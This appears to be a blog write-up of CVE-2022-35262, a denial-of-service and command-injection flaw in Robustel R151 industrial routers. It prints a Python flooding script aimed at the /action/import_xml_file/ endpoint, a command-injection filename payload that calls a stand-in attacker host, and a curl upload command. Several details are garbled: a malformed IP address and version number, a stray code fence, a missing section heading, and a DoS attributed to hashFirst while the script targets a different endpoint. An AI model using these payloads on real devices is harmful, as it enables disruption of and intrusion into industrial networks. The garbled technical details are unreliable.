CVE-2022-35262 - Denial of Service & Command Injection in Robustel R151 Routers

Introduction:  
CVE-2022-35262 is a serious vulnerability discovered in Robustel R151 routers (versions 3.1.16 and 3.3.). These industrial gateways are used worldwide for remote device management, making this a critical security issue. The vulnerability centers on the router’s web server, particularly the hashFirst function, and also affects the /action/import_xml_file/ API, exposing it to both denial of service (DoS) and command injection attacks.

What is the Robustel R151?

The Robustel R151 is a cellular router designed for industrial and IoT solutions. It’s widely deployed because of its reliable remote access and data transfer features. However, as with many embedded systems, security risks need close attention.

Denial of Service in hashFirst Functionality

Root Cause:  
A flaw in the way the hashFirst function inside Robustel’s web server processes specially-crafted HTTP requests. An attacker can exploit this by sending malformed requests, ultimately crashing or freezing the device—leading to a denial of service.

Network Access:

The attacker needs network access to the router’s management interface (usually on port 80/443).

Simple Proof-of-Concept (DoS)

Here’s a simple Python script example for educational purposes only (don’t attack devices you don’t own!):

import requests

target_ip = "http://192.168..1";  # Replace with your target's IP address
endpoint = "/action/import_xml_file/"  # The vulnerable endpoint

# Malformed request to trigger hashFirst vulnerability
data = {'filename': 'A'*10000}
files = {'file': ('evil.xml', '<root></root>')}

for i in range(100):  # Send multiple requests
    try:
        response = requests.post(target_ip + endpoint, data=data, files=files, timeout=2)
        print(f"Sent request {i}, Status: {response.status_code}")
    except Exception as e:
        print(f"Error on request {i}: {e}")

This script floods the endpoint with oversized parameters, which can crash the device web server if it's unpatched.


## Command Injection via /action/import_xml_file/ API

Description:
The /action/import_xml_file/ API endpoint suffers from a command injection flaw. By uploading a specially crafted XML file, an attacker can execute system commands with the privileges of the web server process.

Payload Example:

Suppose the web backend processes submitted XML files insecurely (via system calls like os.system or popen). Here’s how an attacker might insert a harmless demonstration command:

test.xml; ping -c 4 evil.example.com;

`sh

curl -F 'file=@malicious.xml' http://192.168..1/action/import_xml_file/

Robustel has released patches; update to the latest firmware immediately.

See: Robustel Security Bulletin

Monitor Traffic:

Use IDS/IPS to spot and block anomalous or repeated requests to the /action/import_xml_file/ endpoint.

References

- NVD — CVE-2022-35262 Official Entry
- Robustel Security Advisories
- Full Disclosure Mailing List — Original Report
- Exploit Database

Conclusion

CVE-2022-35262 combines a denial of service with a severe command injection vulnerability in a common industrial router. With so many deployments in the field, prompt action is essential: if you own or manage Robustel R151s, update the firmware and limit network access as soon as possible.


Disclaimer:  
This article is for educational awareness only. Never attempt exploitation without permission. Always patch and secure your devices.  


*Stay safe, and always keep your embedded devices updated!*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:56:00 UTC